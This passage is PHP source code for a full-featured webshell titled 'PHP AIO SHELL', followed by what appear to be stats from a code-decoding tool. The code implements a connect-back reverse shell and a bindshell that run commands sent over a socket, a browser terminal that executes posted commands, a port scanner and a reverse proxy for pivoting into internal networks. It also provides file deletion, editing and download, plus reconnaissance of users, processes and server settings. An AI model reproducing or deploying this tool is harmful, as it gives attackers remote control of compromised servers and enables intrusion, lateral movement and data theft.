if (($dp = opendir($dir_path)) == false) {
echo "open $dir_path failed.\n";
return -1;
}
while (($file_name = readdir($dp)) != false) {
if ($file_name == "." || $file_name == "..")
continue;
$sub_path = $dir_path."/".$file_name;
echo "$sub_path\n";
}
}
closedir($dp);
return 0;
}
function read_dirs($dir_path)
{
echo '
<table>
<tr class="banner">
<td width="400" >Filename</td>
<td width="400" >Last modified</td>
<td width="400" >Size</td>
<td width="400" >Chmod/Perms</td>
<td width="400" >Action</td>
</tr>';
if (is_dir($dir_path)) {
if (($dp = opendir($dir_path)) == false) {
echo "open $dir_path failed.\n";
return -1;
}
while (($file_name = readdir($dp)) != false) {
if ($file_name == "." || $file_name == "..")
continue;
$sub_path = $dir_path."/".$file_name;
$last_modify_time=date("Y/m/d H:i:s", fileatime($file_name));
$file_size=filesize($file_name);
$file_size_string=get_human_size($file_size);
$file_perms=get_file_perms($file_name);
$file_perms_string=get_human_file_perms($file_name);
$file_owner=get_file_owner($file_name);
echo '<tr class="directory">
<td width="400" ><a href='.$file_name.'>'.$file_name.'</a></td>
<td width="400" >'.$last_modify_time.'</td>
<td width="400" >'.$file_size_string.'</td>
<td width="400" >'.$file_perms.' / '.$file_perms_string.' / '.$file_owner.'</td>
<td width="400" ><a href="webshell.php?delete='.$file_name.'"'.'>Delete </a>
<a href="webshell.php?edit='.$file_name.'"'.'>Edit </a>
<a href="webshell.php?download='.$file_name.'"'.'>Download </a>
<a href="webshell.php?rename='.$file_name.'"'.'>Rename </a>
</td>
</tr>';
}
}
echo '</table>';
closedir($dp);
return 0;
}
function aio_directory()
{
$curr_path=getcwd();
return read_dirs($curr_path);
}
function search_file_by_name($dir_path, $target_file)
{
if (is_dir($dir_path)) {
if (($dp = opendir($dir_path)) == false) {
echo "open $dir_path failed.\n";
return -1;
}
while (($file_name = readdir($dp)) != false) {
if ($file_name == "." || $file_name == "..")
continue;
$sub_path = $dir_path."/".$file_name;
if (is_dir($sub_path)) {
search_file_by_name($sub_path, $target_file);
}
if (!strcmp($file_name, $target_file)) {
echo "found $target_file.\n";
closedir($dp);
return 0;
}
}
echo "not found $target_file.\n";
closedir($dp);
}
return -1;
}
/**
* show file attribute with cetern flag.
*
* @dir_path - directroy to search.
* @attr_flag - 0 readable.
* - 1 writeable.
* - 2 executable.
*/
function show_attr_file($dir_path, $attr_flag)
{
if (is_dir($dir_path)) {
if (($dp = opendir($dir_path)) == false) {
echo "open $dir_path failed.\n";
return -1;
}
while (($file_name = readdir($dp)) != false) {
if ($file_name == "." || $file_name == "..")
continue;
$sub_path = $dir_path."/".$file_name;
if (is_dir($sub_path)) {
show_attr_file($sub_path, $attr_flag);
}
if ($attr_flag == 0) {
if (is_readable($file_name))
echo "$sub_path\n";
}
else if ($attr_flag == 1) {
if (is_writable($file_name))
echo "$sub_path\n";
}
else if ($attr_flag == 2) {
if (is_executable($file_name))
echo "$sub_path\n";
}
else {
echo "wrong attribute flag.\n";
break;
}
}
closedir($dp);
}
return 0;
}
function create_dir($dir_path)
{
if (file_exists($dir_path))
return -1;
if (mkdir($dir_path, 0700) == false) {
echo "create $dir_path failed.\n";
return -1;
}
echo "create $dir_path ok.\n";
return 0;
}
function destroy_dir($dir_path)
{
if (file_exists($dir_path) == false)
return -1;
if (rmdir($dir_path) == false) {
echo "delete $dir_path failed.\n";
return -1;
}
echo "delete $dir_path ok.\n";
return 0;
}
function destroy_dirs($dir_path)
{
if (is_dir($dir_path)) {
if (($dp = opendir($dir_path)) == false) {
echo "open $dir_path failed.\n";
return -1;
}
while (($file_name = readdir($dp)) != false) {
if ($file_name == "." || $file_name == "..")
continue;
$sub_path = $dir_path."/".$file_name;
if (is_dir($sub_path)) {
destroy_dirs($sub_path);
}
else
delete_file($sub_path);
}
closedir($dp);
destroy_dir($dir_path);
return 0;
}
return 0;
}
function linux_id()
{
$uid = posix_getuid();
$user_info = posix_getpwuid($uid);
echo "uid=".$uid."(".$user_info['name'].") ";
echo "gid=".$user_info['gid']."(".$user_info['name'].") ";
echo "dir=".$user_info['dir']." ";
echo "shell=".$user_info['shell']."\n";
}
function linux_uname()
{
$uname = posix_uname();
echo $uname['sysname']." ".$uname['nodename']." ".$uname['release']." ";
echo $uname['version']." ".$uname['machine'];
}
function get_proc_name($file_name)
{
$fp = fopen($file_name, "r");
if ($fp == false) {
echo "open $file_name failed.\n";
return -1;
}
while (($buf = fgets($fp, 1024)) != false ) {
if (strstr($buf, "Name:") != NULL) {
sscanf($buf, "%s %s", $tmp, $name);
fclose($fp);
return $name;
}
}
fclose($fp);
return 0;
}
function get_proc_cmd($file_name)
{
$fp = fopen($file_name, "r");
if ($fp == false) {
echo "open $file_name failed.\n";
return -1;
}
$cmd = fgets($fp, 1024);
fclose($fp);
return $cmd;
}
function linux_ps()
{
if (($dp = opendir("/proc")) == false) {
echo "open /proc failed.\n";
return -1;
}
echo "open /proc ok.\n";
while (($file_name = readdir($dp)) != false) {
if ($file_name == "." || $file_name == "..")
continue;
if (ctype_digit($file_name) == false)
continue;
$dir_path = "/proc/$file_name/status";
$proc_name = get_proc_name($dir_path);
$dir_path = "/proc/$file_name/cmdline";
$proc_cmd = get_proc_cmd($dir_path);
echo $file_name."\t\t".$proc_name." ".$proc_cmd."\n";
}
closedir($dp);
return 0;
}
function tcp_connect($host, $port)
{
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket == false) {
echo "create socket error.\n";
return -1;
}
if (@socket_connect($socket, $host, $port) == false) {
socket_close($socket);
return -1;
}
return $socket;
}
function tcp_connect_timeout($host, $port, $timeout)
{
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket == false) {
echo "create socket error.\n";
return -1;
}
if (socket_set_nonblock($socket) == false) {
echo "set nonblock error.\n";
socket_close($socket);
return -1;
}
$time = time();
while (!@socket_connect($socket, $host, $port)) {
$err = socket_last_error($socket);
if ($err == 115 || $err == 114) {
if ((time() - $time) >= $timeout) {
socket_close($socket);
echo "socket timeout.\n";
return -1;
}
sleep(1);
continue;
}
socket_close($socket);
return -1;
}
echo "connect to $host:$port ok.\n";
return $socket;
}
function run_proxy_client($remote_host1, $remote_port1, $remote_host2, $remote_port2)
{
$socket1 = tcp_connect($remote_host1, $remote_port1);
if ($socket1 == -1) {
echo "connect to $remote_host1:$remote_port1 failed.\n";
return -1;
}
echo "connect to $remote_host1:$remote_port1 ok.\n";
$socket2 = tcp_connect($remote_host2, $remote_port2);
if ($socket2 == -1) {
echo "connect to $remote_host2:$remote_port2 failed.\n";
socket_close($socket1);
return -1;
}
echo "connect to $remote_host2:$remote_port2 ok.\n";
run_proxy_core($socket1, $remote_host1, $socket2, $remote_host2);
return 0;
}
function web_proxy_client()
{
echo '<html><head><style>
h3.banner
{
text-align:center;
color:#384850;
font-weight:bold;
}
form
{
text-align:center;
}
input[type=text]
{
width:300px;
color:#384850;
background-color:#ffffff;
}
input[type=submit]
{
width:80px;
color:#384850;
background-color:#ffffff;
}
</head></style>
<body>
<h3 class="banner">Linux reverse proxy</h3>
<form action="" method="post">
<b>intranet host</b>
<input type="text" name="intranet_host" />
<b>intranet port</b>
<input type="text" name="intranet_port" /><br />
<b>public host</b>
<input type="text" name="public_host" />
<b>public port</b>
<input type="text" name="public_port" /><br /><br />
<input type="submit" value="Run" />
</form>
</body>
</html>';
if (empty($_POST['intranet_host']) || empty($_POST['intranet_port']) ||
empty($_POST['public_host']) || empty($_POST['public_port']))
return -1;
run_proxy_client($_POST['intranet_host'], $_POST['intranet_port'],
$_POST['public_host'], $_POST['public_port']);
}
function run_proxy_core($socket1, $remote_host1, $socket2, $remote_host2)
{
while (true) {
$read_sockets = array($socket1, $socket2);
$write_sockets = NULL;
$except_sockets = NULL;
if (socket_select($read_sockets, $write_sockets, $except, 0) == -1) {
echo "socket_select error ".socket_strerror(socket_last_error())."\n";
break;
}
if (in_array($socket2, $read_sockets)) {
//echo "got data from $remote_host2.\n";
$bytes2 = socket_recv($socket2, $buf2, 1024, MSG_DONTWAIT);
if ($bytes2 == false) {
echo "socket_recv ".socket_strerror(socket_last_error($socket2))."\n";
break;
}
//echo "got bytes $bytes2.\n";
if ($bytes2 == 0) {
echo "recv no data from $remote_host2.\n";
break;
}
$ret2 = socket_send($socket1, $buf2, $bytes2, MSG_EOR);
if ($ret2 == false) {
echo "socket_send ".socket_strerror(socket_last_error($socket1))."\n";
break;
}
if ($ret2 != $bytes2) {
echo "send data failed.\n";
break;
}
//echo "write $ret2 bytes ok.\n";
}
if (in_array($socket1, $read_sockets)) {
//echo "got data from $remote_host1.\n";
$bytes1 = socket_recv($socket1, $buf1, 1024, MSG_DONTWAIT);
if ($bytes1 == false) {
echo "socket_recv ".socket_strerror(socket_last_error($socket1))."\n";
break;
}
//echo "got bytes $bytes1.\n";
if ($bytes1 == 0) {
echo "recv no data from $remote_host1.\n";
break;
}
$ret1 = socket_send($socket2, $buf1, $bytes1, MSG_EOR);
if ($ret1 == false) {
echo "socket_send ".socket_strerror(socket_last_error($socket2))."\n";
break;
}
if ($ret1 != $bytes1) {
echo "send data failed.\n";
break;
}
//echo "write $ret1 bytes ok.\n";
}
}
echo "proxy done.\n";
socket_close($socket1);
socket_close($socket2);
return 0;
}
function init_proxy_server($local_port)
{
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket == false) {
echo "create socket error.\n";
return -1;
}
if (socket_bind($socket, '0', $local_port) == false) {
echo "bind sock error.\n";
socket_close($socket);
return -1;
}
if (socket_listen($socket) == false) {
echo "listen sock error.\n";
socket_close($socket);
return -1;
}
echo "listen on port $local_port ok.\n";
return $socket;
}
function run_proxy_server($local_port1, $local_port2)
{
$socket1 = init_proxy_server($local_port1);
if ($socket1 == -1)
return -1;
while (true) {
if (($newsock1 = socket_accept($socket1)) !== false) {
socket_getpeername($newsock1, $ip1);
echo "got a client form $ip1\n";
break;
}
}
$socket2 = init_proxy_server($local_port2);
if ($socket2 == -1)
return -1;
while (true) {
if (($newsock2 = socket_accept($socket2)) !== false) {
socket_getpeername($newsock2, $ip2);
echo "got a client form $ip2\n";
break;
}
}
echo "start transmit data ...\n";
run_proxy_core($newsock2, $ip2, $newsock1, $ip1);
socket_close($socket2);
socket_close($socket1);
return 0;
}
function tcp_connect_port($host, $port, $timeout)
{
$fp = @fsockopen($host, $port, $errno, $errstr, $timeout);
return $fp;
}
function port_scan_fast($host, $timeout, $banner)
{
$general_ports = array(
'21'=>'FTP',
'22'=>'SSH',
'23'=>'Telnet',
'25'=>'SMTP',
'79'=>'Finger',
'80'=>'HTTP',
'81'=>'HTTP/Proxy',
'110'=>'POP3',
'135'=>'MS Netbios',
'139'=>'MS Netbios',
'143'=>'IMAP',
'162'=>'SNMP',
'389'=>'LDAP',
'443'=>'HTTPS',
'445'=>'MS SMB',
'873'=>'rsync',
'1080'=>'Proxy/HTTP Server',
'1433'=>'MS SQL Server',
'2433'=>'MS SQL Server Hidden',
'1521'=>'Oracle DB Server',
'1522'=>'Oracle DB Server',
'3128'=>'Squid Cache Server',
'3129'=>'Squid Cache Server',
'3306'=>'MySQL Server',
'3307'=>'MySQL Server',
'3500'=>'Squid Cache Server',
'3389'=>'MS Terminal Service',
'5800'=>'VNC Server',
'5900'=>'VNC Server',
'8080'=>'Proxy/HTTP Server',
'10000'=>'Webmin',
'11211'=>'Memcached'
);
echo '<table>';
foreach($general_ports as $port=>$name) {
if (($fp = tcp_connect_port($host, $port, $timeout)) != false) {
if (empty($banner) == false) {
$data = fgets($fp, 128);
echo '<tr>
<td>'.$host.'</td>
<td>'.$port.'</td>
<td>'.$name.'</td>
<td>'.$data.'</td>
</tr>';
}
else {
echo '<tr>
<td>'.$host.'</td>
<td>'.$port.'</td>
<td>'.$name.'</td>
</tr>';
}
fclose($fp);
}
}
echo '</table>';
}
function port_scan($host, $src_port, $dst_port, $timeout, $banner)
{
echo '<table>
<tr>
<td>Host</td>
<td>Port</td>
<td>State</td>
</tr>';
for ($port = $src_port; $port <= $dst_port; $port++) {
if (($fp = tcp_connect_port($host, $port, $timeout)) != false) {
if (empty($banner) == false) {
$data = fgets($fp, 128);
echo '<tr>
<td>'.$host.'</td>
<td>'.$port.'</td>
<td>'.$data.'</td>
</tr>';
}
else {
echo '<tr>
<td>'.$host.'</td>
<td>'.$port.'</td>
<td>OPEN</td>
</tr>';
}
fclose($fp);
}
}
echo '</table>';
}
function run_portscan()
{
echo '<html>
<head>
<style>
tr.directory
{
font-size:14px;
text-align:left;
height:20px;
border:1px solid #98bf21;
padding:2px 6px 2px 6px;
}
</style>
</head>
<body>
<form action="" method="post">
target host
<input type="text" name="scan_host" value="127.0.0.1" />
timeout
<input type="text" name="scan_timeout" value="5" />
general ports
<input type="checkbox" name="scan_fast" />
banner
<input type="checkbox" name="scan_banner" />
<input type="submit" value="scan" />
</form>
</body>
</html>';
if (empty($_POST['scan_host']))
return -1;
if (isset($_POST['scan_fast'])) {
port_scan_fast($_POST['scan_host'], $_POST['scan_timeout'],
$_POST['scan_banner']);
}
else {
port_scan($_POST['scan_host'], "1", "65535",
$_POST['scan_timeout'],
$_POST['scan_banner']);
}
}
function linux_exec($socket, $cmd)
{
$handle = popen($cmd, "r");
while (($buf = fgets($handle, 1024)) != false) {
$ret = socket_write($socket, $buf, strlen($buf));
if ($ret == false) {
return -1;
}
}
pclose($handle);
return 0;
}
function connect_backdoor($host, $port)
{
$banner = "connect back from phpshell\n";
$socket = tcp_connect($host, $port);
if ($socket == -1) {
echo "connect to $host:$port failed.\n";
return -1;
}
echo "connect to $host:$port ok.\n";
$ret = socket_write($socket, $banner, strlen($banner));
if ($ret == false) {
echo "write data failed.\n";
socket_close($socket);
return -1;
}
while (true) {
$buf = socket_read($socket, 1024);
echo $buf;
linux_exec($socket, $buf);
}
}
function bindshell($local_port)
{
$banner = "bindshell from phpshell\n";
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket == false) {
echo "create socket error.\n";
return -1;
}
if (socket_bind($socket, '0', $local_port) == false) {
echo "bind sock error.\n";
socket_close($socket);
return -1;
}
if (socket_listen($socket) == false) {
echo "listen sock error.\n";
socket_close($socket);
return -1;
}
echo "listen on port $local_port ok.\n";
while (true) {
if (($newsock = socket_accept($socket)) !== false) {
socket_getpeername($newsock, $ip);
echo "got a client form $ip"."<br />";
break;
}
}
$ret = socket_write($newsock, $banner, strlen($banner));
if ($ret == false) {
echo "write data failed.\n";
socket_close($newsock);
socket_close($socket);
return -1;
}
while (true) {
$buf = socket_read($newsock, 1024);
echo $buf;
linux_exec($newsock, $buf);
}
socket_close($newsock);
socket_close($socket);
return 0;
}
function run_backdoor()
{
echo '<html><head><style>
h3.banner
{
text-align:center;
color:#384850;
font-weight:bold;
}
form
{
text-align:center;
}
input[type=text]
{
width:300px;
color:#384850;
background-color:#ffffff;
}
input[type=submit]
{
width:80px;
color:#384850;
background-color:#ffffff;
}
</head></style>
<h3 class="banner" >Linux connect backdoor</h3>
<form action="" method="post">
Target host
<input type="text" name="target_host" />
Target port
<input type="text" name="target_port" />
<input type="submit" value="Connect" />
</form>
</br />
<h3 class="banner" >Linux bindshell backdoor</h3>
<form action="" method="post">
Bind port
<input type="text" name="bind_port" />
<input type="submit" value="Bindshell" />
</form>
</html>';
if ($_POST['target_host'] && $_POST['target_port']) {
connect_backdoor($_POST['target_host'], $_POST['target_port']);
}
if ($_POST['bind_port']) {
bindshell($_POST['bind_port']);
}
}
/*
function exec_shell($cmd)
{
$handle = popen($cmd, "r");
while (($buf = fgets($handle, 1024)) != false) {
echo $buf;
}
pclose($handle);
return 0;
}
function run_shell()
{
$host_name = gethostbyaddr($_SERVER['SERVER_NAME']);
$uid = posix_getuid();
$user_info = posix_getpwuid($uid);
echo '<html>
<head>
<style>
input[type=text]
{
width:1130px;
color:#384850;
background-color:#ffffff;
}
textarea
{
width:1130px;
color:#384850;
background-color:#ffffff;
}
</style>
</head>
<body>
<form action="" method="post">
<font color="#384850">'.$user_info['name'].'@'.$host_name.'$</font>
<input style="border:none" color="#384850" type="text" name="shellcmd" />
<input style="border:none" color="#384850" type="submit" value="Execute" /><br /><br />
<textarea name="textarea" cols="150" rows="30" readonly>';
if ($_POST['shellcmd']) {
//echo $user_info['name'].'@'.$host_name.'$';
//echo $_POST['shellcmd'];
exec_shell($_POST['shellcmd']);
echo '</textarea></form></body></html>';
}
}
*/
function run_terminal_shell($cmd)
{
$handle = popen($cmd, "r");
while (($buf = fgets($handle, 1024)) != false) {
$data .= $buf."";
}
pclose($handle);
return $data;
}
function aio_shell()
{
$host_name = gethostbyaddr($_SERVER['SERVER_NAME']);
$uid = posix_getuid();
$user_info = posix_getpwuid($uid);
$curr_path = getcwd();
$prompt=$user_info['name'].'@'.$host_name.':'.$curr_path;
echo '<html>
<head>
<style>
tr.banner
{
font-size: 18px;
font-style:italic;
color:#ffffff;
background-color: #285070;
}
tr.prompt
{
font-size: 14px;
color:#285800;
background-color: #000000;
}
textarea {border: none; margin: 0px; padding: 2px 2px 2px; color: #285800; background-color: #000000;}
input
{
color: #285800; background-color: #000000;
}
</style>
<script type="text/javascript" language="JavaScript">
function init()
{
document.shell.output.scrollTop = document.shell.output.scrollHeight;
}
</script>
</head>
<body onload="init()">
<table align="center" border="0" width="600" cellpadding="0" cellspacing="0">
<tr class="banner">
<td width="10%"><b>TERMINAL</b></td>
<td align="center">'.$prompt.'</td>
</tr>
<form name="shell" action="" method="post">
<tr class="prompt">
<td colspan="2" nowrap>
<textarea name="output" rows="20" cols="90">';
if ($_POST['shellcmd']) {
$cmd_data = $prompt.'$'.$_POST['shellcmd']."\n";
$cmd_data .= run_terminal_shell($_POST['shellcmd']);
$_SESSION['output'] .= $cmd_data;
echo $_SESSION['output'];
}
echo '</textarea><br />'.$prompt.'$'.'
<input style="border:none" type="text" name="shellcmd" />
<input style="border:none" type="submit" value="" />
</td>
</tr>
</form>
<tr class="banner">
<td align="center" height="20" colspan="2"> © wzt 2014 http://www.cloud-sec.org</td>
</tr>
</table>
</body>
</html>';
}
function webshell_main()
{
if (isset($_GET['cmd'])) {
if ($_GET['cmd'] == "backdoor") {
run_backdoor();
}
if ($_GET['cmd'] == "shell") {
aio_shell();
}
if ($_GET['cmd'] == "portscan") {
run_portscan();
}
if ($_GET['cmd'] == "proxy") {
web_proxy_client();
}
}
else {
echo '<html>
<body>
<table border="0" cellpadding="10" cellspacing="20">
<tr>
<td><a href="webshell.php?cmd=showdir">show directorys</a></td>
<td><a href="webshell.php?cmd=backdoor">connect backdoor</a></td>
<td><a href="webshell.php?cmd=portscan">port scan</a></td>
<td><a href="webshell.php?cmd=proxy">reverse proxy</a></td>
<td><a href="webshell.php?cmd=shell">cmd shell</a></td>
</tr>
</body>
</html>';
}
}
function aio_main()
{
$uid = posix_getuid();
$user_info = posix_getpwuid($uid);
$uid_banner="uid=".$uid."(".$user_info['name'].") ".
"gid=".$user_info['gid']."(".$user_info['name'].") ".
"dir=".$user_info['dir']." ".
"shell=".$user_info['shell'];
$uname = posix_uname();
$uname_banner=$uname['sysname']." ".$uname['nodename']." ".$uname['release']." ".
$uname['version']." ".$uname['machine'];
$server_addr=$_SERVER['SERVER_NAME'];
$server_port= $_SERVER['SERVER_PORT'];
$server_time=date("Y/m/d h:i:s",time());
$phpsoft=$_SERVER['SERVER_SOFTWARE'];
$php_version=PHP_VERSION;
$zend_version=zend_version();
$dis_func=get_cfg_var("disable_functions");
$safemode=@ini_get('safe_mode');
if ($safemode == false)
$safemode="On";
$cwd_path=getcwd();
$total_disk=disk_total_space("/");
$total_disk_gb=intval($total_disk/(1024*1024*1024));
$free_disk=disk_free_space("/");
$free_disk_gb=intval($free_disk/(1024*1024*1024));
echo '<html>
<head>
<style>
body
{
background-color:#FFFFFF;
}
ul.banner
{
list-style-type:none;
margin:0;
padding:0;
text-align:center;
color:#384850;
background-color:gray;
font-size:20px;
font-weight:bold;
}
ul.directory
{
font-size:14px;
text-align:left;
font-weight: bold;
}
li
{
display:inline;
}
a:link
{
color:#384850;
}
a:visited
{
color:#384850;
}
a:hover
{
color:#384850;
}
a:active
{
color:#384850;
}
h2.banner
{
text-align:center;
color:#384850;
font-weight:bold;
}
table.banner
{
font-size:14px;
}
tr.banner
{
font-size:16px;
color:#384850;
background-color:gray;
}
tr.directory
{
font-size:14px;
text-align:left;
height:20px;
border:1px solid #98bf21;
padding:2px 6px 2px 6px;
}
p.banner
{
font-size:14px;
}
</style>
</head>
<body>
<h2 class="banner">PHP AIO SHELL</h2>
<hr />
<table class="banner">
<tr>
<td width="1200" >User: '.$uid_banner.'</td>
<td width="200" align="center" >'.$server_time.'</td>
</tr>
<tr>
<td width="1200" >Uname: '.$uname_banner.'</td>
<td width="200" align="center" >'.$server_addr.":".$server_port.'</td>
</tr>
</table>
<hr />
<p class="banner">Software: '.$phpsoft.' | PHP: '.$php_version.' | ZEND: '.$zend_version.'
| Safemode: '.$safemode.' | disfunc: '.$dis_func.'
</p>
<table class="banner">
<tr>
<td width="200" align="left">Directroy: '.$cwd_path.'</td>
<td width="200" >Disk: total '.$total_disk_gb.'GB free '.$free_disk_gb.'GB </td>
</tr>
</table>
<br />
<ul class="banner">
<li><a href="webshell.php?cmd=dir">[Directorys]</a></li>
<li><a href="webshell.php?cmd=backdoor">[Backdoor]</a></li>
<li><a href="webshell.php?cmd=portscan">[PortScan]</a></li>
<li><a href="webshell.php?cmd=proxy">[Proxy]</a></li>
<li><a href="webshell.php?cmd=shell">[Shell]</a></li>
<li><a href="webshell.php?cmd=crack">[Crack]</a></li>
<li><a href="webshell.php?cmd=mysql">[Mysql]</a></li>
</ul>
<br />
</body>
</html>';
if ($_GET['cmd']) {
if ($_GET['cmd'] == "dir") {
aio_directory();
}
if ($_GET['cmd'] == "backdoor") {
run_backdoor();
}
if ($_GET['cmd'] == "shell") {
aio_shell();
}
if ($_GET['cmd'] == "portscan") {
run_portscan();
}
if ($_GET['cmd'] == "proxy") {
web_proxy_client();
}
}
if ($_GET['delete']) {
delete_file($_GET['delete']);
}
if ($_GET['edit']) {
edit_file($_GET['edit']);
}
}
aio_main();
?>
Function Calls
aio_main | 1 |
posix_getuid | 1 |
session_start | 1 |
error_reporting | 1 |
Stats
MD5 | 29836a2f5e2362706dd3d219a8db5a8f |
Eval Count | 0 |
Decode Time | 234 ms |